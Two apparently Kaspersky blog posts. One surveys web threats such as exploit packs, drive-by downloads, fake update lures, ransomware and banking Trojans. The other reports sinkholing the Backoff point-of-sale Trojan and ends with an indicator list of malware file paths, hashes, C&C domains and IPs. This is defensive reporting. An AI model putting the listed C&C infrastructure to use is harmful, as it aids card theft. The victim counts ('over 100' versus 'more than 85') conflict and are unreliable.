
Kaspersky Lab registers thousands of legitimate sites every day that download malicious code to their visitors with them being aware of it. Among the most prominent cases were the Lurk Trojan found on the site of the RIA Novosti news agency and gazeta.ru and the infection of PHP.Net

Visitors to an infected site are attacked with the use of hidden drive-by-downloads. The infection goes unnoticed by the users and does not require them to download or activate anything. An exploit, or set of exploits, is automatically downloaded from the page and, if the targeted machine has vulnerable software, a malicious executable is launched.

Exploit packs

The most effective tool to infect a victim's computer is an exploit pack, such as Blackhole. These are hot products on the black market: exploit packs are developed to order or for widespread sale and are supported and updated. The price depends on the quantity and "freshness" of the exploits included, the ease of administration, the quality of the support, the regularity of updates and the greed of the seller.

As these attacks take place through the browser, the exploits have to use a vulnerability in either the browser itself, add-ons to it or third party software loaded by the browser to handle content. If one of these exploits is used successfully, a malicious file will be launched on the victim's machine.

Typical set of add-ons for the Internet Explorer browser that have permission to run by default. Add-ons the vulnerabilities in which are often used to attack a system are underlined in red.

An effective pack will contain exploits for useful vulnerabilities in popular browsers and their add-ons, and also for Adobe Flash Player and other popular programs. Often exploit packs have tools for fine tuning and collecting infection statistics.

Styx exploit pack control panel

Direct download by users

Quite often cybercriminals don't need ingenious and expensive tools to insert their malicious programs onto users' computers. Users can simply be fooled into downloading and running malware themselves.

For instance, on entering a malicious site a user sees a preview video "for adults only". Clicking on this brings up a message to update Adobe Flash Player, and at the same time the site immediately offers him a file to download with an authentic sounding name. By installing the "update" the user infects the computer with a Trojan.

Message appearing when trying to view an "adult" video on a malicious site

Or a web-page might appear imitating the "My Computer" window, saying that a large number of viruses have been detected on the computer. And nearby a window opens offering a free "antivirus" program to cure the problems.

An apparent offer to install a free antivirus program hiding a Trojan

Infection via social networks

Inexperienced users of social networks are open to attack by so-called semi-automatic worms. The future victim receives a message apparently from a virtual acquaintance with the offer of some attractive feature that is missing from the social network (to "dislike" a post, obtain confidential data on other users, etc.). To obtain this attractive feature the user is told to open a JavaScript terminal and enter certain code there.

Instructions for the installation of a semi-automatic Facebook worm

After these actions are carried out the worm activates and begins collecting data on the user, sending links to itself to the victim's contacts, awarding "likes" to various posts. This last option is a paid service that the owner of the worm offers to customers. And so we come to the reason why cybercriminals go to all this trouble and break the law.

Money, money, money

Naturally nobody is attacking our computers for the intellectual challenge — the aim is money. One very popular way of illegally making money from victims is the use of Trojan ransom-ware, making it impossible to use the computer until a certain sum has been paid.

Having penetrated the user's computer the Trojan determines the country where the infected computer is and shows the victim the corresponding disable screen, containing threats and instructions on how to pay the ransom. The language of the message and the payment method suggested by the cybercriminals both depend on the user's country.

Usually the evildoers accuse the user of looking at child pornography or some other illegal action and then threaten a criminal investigation or to make the matter public. The assumption is that the victim will take these threats seriously and won't risk seeking help from law enforcement agencies. In some cases the Trojan ransom-ware may threaten to destroy the contents of the hard disk if the ransom is not paid quickly.

The disable screen that Trojan-Ransom.Win32.Foreign shows users in the USA

The cybercriminals offer the option of paying this "fine" by sending an SMS to a premium number or making a money transfer using one of the payment systems. In return the user should receive an unblocking key to deactivate the Trojan, but in practice this doesn't always happen.

Maintaining a communication channel with the victim can lead law enforcement agencies to the criminals and they frequently prefer not to take the risk, leaving the victim with a practically useless computer.

Another common method of illegal moneymaking is the collection and sale of users' confidential data. Contact details and personal data are tradable commodities that can be sold on the black market, albeit not for a great deal of money. However, it can be a profitable sideline, especially as the collection of information does not necessarily require any malware infection. Often the victims themselves supply all the necessary information — the important thing is for the site hosting the form for the entry of data to appear reliable and authentic.

A false site collecting contact details and personal information of visitors and then signing them up for paid mobile services

Banking Trojans bring their operators large profits. These programs are designed to steal money from users' bank accounts using distance banking systems. Malware of this type steals users' authentication data for online banking systems. Usually this is not enough as almost all banks and payment systems require authentication using several factors - entering an SMS code, inserting a USB key etc. In these cases the Trojan waits until the user makes a payment using internet banking and then changes the payment details, diverting the money to special accounts from which the criminal can cash out. There are other ways around two factor authentication: the Trojan might intercept messages with single use passwords or freeze the system at the moment the USB key is inserted, leaving the user powerless while the criminals hijack the operation and steal the money.

Finally, another profitable business is running botnets. The infected computers in a botnet can, unnoticed, be used by the evildoers for various money-making activities: mining bitcoins, sending spam, carrying out DDOS attacks, and boosting sites' ratings through search requests.

Counteracting threats

As we have already shown, internet threats are diverse and can threaten users almost anywhere — when reading their mail, interacting on social networks, checking the news or simply surfing. There are also many ways to protect against these threats, but they can be summarized in four keys pieces of advice:

  • Always pay attention to what you are doing on the Internet: which sites you visit, which files you download and what you run on your computer.
  • Do not trust messages from unknown users and organizations, do not click on links and do not open attachments.
  • Regularly update frequently-used software, especially software that works with your browser
  • Install up-to-date defenses and keep anti-virus databases current.

It all sounds very simple, but the growing number of infections clearly demonstrates that too many users fail to take their safety seriously and neglect to follow this advice. We hope that our overview of current internet threats will help improve the situation.

Sinkholing the Backoff POS Trojan

Fri, 08/29/2014 - 04:55

There is currently a lot of buzz about the Backoff point-of-sale Trojan that is designed to steal credit card information from computers that have POS terminals attached.

Trustwave SpiderLab, which originally discovered this malware, posted a very thorough analysis in July.  The U.S. Secret Service, in partnership with DHS, followed up with an advisory.

Although very thorough, the existing public analyses of Backoff are missing a very relevant piece of information: the command-and-control (C&C) servers. However, if you have access to the samples it isn't hard to extract this information. At the end of this document, you can find a full list together with other IOCs (indicators of compromise).

Backoff malware configuration, with C&Cs

We sinkholed two C&C servers that Backoff samples used to communicate with their masters. These C&C servers are used by certain samples that were compiled from January - March 2014. Over the past few days, we observed over 100 victims in several countries connecting to the sinkhole.

Statistics:

There were several interesting victims among them:

  • A global freight shipping and transport logistics company with headquarters in North America.
  • A U.K.-based charitable organization that provides support, advice and information to local voluntary organizations and community groups.
  • A payroll association in North America.
  • A state institute connected with information technology and communication in Eastern Europe.
  • A liquor store chain in the U.S.
  • An ISP in Alabama, U.S.
  • A U.S.-based Mexican food chain.
  • A company that owns and manages office buildings in California, U.S.
  • A Canadian company that owns and operates a massive chain of restaurants.

There are also a lot of home user lines, mostly in the U.S. and Canada, connecting to the sinkhole. This is to be expected as many smaller businesses generally tend to run those rather than dedicated corporate connections.

Conclusions

The success of Backoff paints a very bleak picture of the state of point-of-sale security. Our sinkhole covers less than 5% of the C&C channels and the sinkholed domains only apply to certain Backoff samples that were created in the first quarter of this year. Yet, we've seen more than 85 victims connecting to our sinkhole.

Most of these victims are located in North America and some of them are high profile. Taking into account the U.S. Secret Service statement, it's a pretty safe bet that the number of Backoff infections at businesses in North America is well north of 1,000.

Since its appearance last year, Backoff has not changed dramatically. The author created both non-obfuscated and obfuscated samples. This was likely done to defeat the security controls on the targeted networks. However, the defenses running on a PoS terminal and/or network should not have been affected by this. This speaks volumes about the current state of PoS security, and other cybercriminals are sure to have taken note.

It's very clear that PoS networks are prime targets for malware attacks. This is especially true in the US, which still doesn't support EMV chip-enabled cards. Unlike magnetic strips, EMV chips on credit cards can't be easily cloned, making them more resilient. Unfortunately, the US is adopting chip and signature, rather than chip and PIN. This effectively negates some of the added security EMV can bring.

This may prove another costly mistake. Not adopting EMV along with the rest of the world is really haunting retail in the U.S. and the situation is not likely to change anytime soon.

IOCs / C&Cs: Trojan file paths:

%APPDATA%\AdobeFlashPlayer\mswinsvc.exe
%APPDATA%\AdobeFlashPlayer\mswinhost.exe
%APPDATA%\AdobeFlashPlayer\Local.dat
%APPDATA%\AdobeFlashPlayer\Log.txt
%APPDATA%\mskrnl
%APPDATA%\nsskrnl
%APPDATA%\winserv.exe
%APPDATA%\OracleJava\javaw.exe
%APPDATA%\OracleJava\javaw.exe
%APPDATA%\OracleJava\Local.dat
%APPDATA%\OracleJava\Log.txt

Kaspersky names for the Trojans:

HEUR:Trojan.Win32.Invader
HEUR:Trojan.Win32.Generic
Backdoor.Win32.Backoff
Trojan.Win32.Agent.ahhia
Trojan.Win32.Agent.agvmh
Trojan.Win32.Agent.aeyfj
Trojan-Spy.Win32.Recam.qq
Trojan-Dropper.Win32.Sysn.ajci
Trojan.Win32.Bublik.covz
Trojan-Dropper.Win32.Dapato.dddq
Trojan.Win32.Agent.agufs
Trojan.Win32.Agent.ahbhh
Trojan.Win32.Agent.agigp
Trojan.Win32.Agent.aeqsu
Trojan.Win32.Agent.ahgxs
Trojan.Win32.Inject.mhjl
Trojan.Win32.Agent.ahbhh
Trojan.Win32.Agent.ahhee
Trojan.Win32.Agent.ahgxs

MD5s:

684e03daaffa02ffecd6c7747ffa030e
3ff0f444ef4196f2a47a16eeec506e93
12c9c0bc18fdf98189457a9d112eebfc
14cca3ad6365cb50751638d35bdb84ec
d0f3bf7abbe65b91434905b6955203fe
38e8ed887e725339615b28e60f3271e4
7b027599ae15512256bb5bc52e58e811
5cdc9d5998635e2b91c0324465c6018f
821ac2580843cb0c0f4baff57db8962e
b08d4847c370f79af006d113b3d8f6cf
17e1173f6fc7e920405f8dbde8c9ecac
874cd0b7b22ae1521fd0a7d405d6fa12
ea0c354f61ba0d88a422721caefad394
6a0e49c5e332df3af78823ca4a655ae8
8a019351b0b145ee3abe097922f0d4f6
337058dca8e6cbcb0bc02a85c823a003
842e903b955e134ae281d09a467e420a
d1d544dbf6b3867d758a5e7e7c3554bf
01f0d20a1a32e535b950428f5b5d6e72
fc041bda43a3067a0836dca2e6093c25
4956cf9ddd905ac3258f9605cf85332b
f5b4786c28ccf43e569cb21a6122a97e
cc640ad87befba89b440edca9ae5d235
0b464c9bebd10f02575b9d9d3a771db3
d0c74483f20c608a0a89c5ba05c2197f
b1661862db623e05a2694c483dce6e91
ffe53fb9280bf3a8ceb366997488486e
c0d0b7ffaec38de642bf6ff6971f4f9e
05f2c7675ff5cda1bee6a168bdbecac0
9ee4c29c95ed435644e6273b1ae3da58
0607ce9793eea0a42819957528d92b02
97fa64dfaa27d4b236e4a76417ab51c1
82d811a8a76df0cda3f34fdcd0e26e27
0b7732129b46ed15ff73f72886946220
30c5592a133137a84f61898993e513db
aa68ecf6f097ffb01c981f09a21aef32
bbe534abcc0a907f3c18cfe207a5dfca
29e0259b4ea971c72fd7fcad54a0f8d0

C&C domains and hostnames:

00000000000.888[.]ru
10000000000.888[.]ru
adobephotoshop11111[.]com
adobephotoshop22222[.]com
domain12827312[.]com
helloflashplayers12345[.]com
hellojavaplayers12345[.]com
ilovereservdom213ada2[.]ru
iownacarservice[.]ru
iownacarservice1[.]com
msframework1[.]com
msframework1[.]ru
msframeworkx64[.]com
msframeworkx86[.]com
msframeworkx86[.]ru
msoffice365net[.]com
nullllllllllll[.]com
ollygo030233[.]com
ollygo030233[.]ru
pop3smtp5imap2[.]com
pop3smtp5imap3[.]com
pop3smtp5imap4[.]ru
reservedomain12312[.]ru
total-updates[.]com

C&C IPs:

146.185.233.32
81.4.111.176
95.211.228.249
217.174.105.86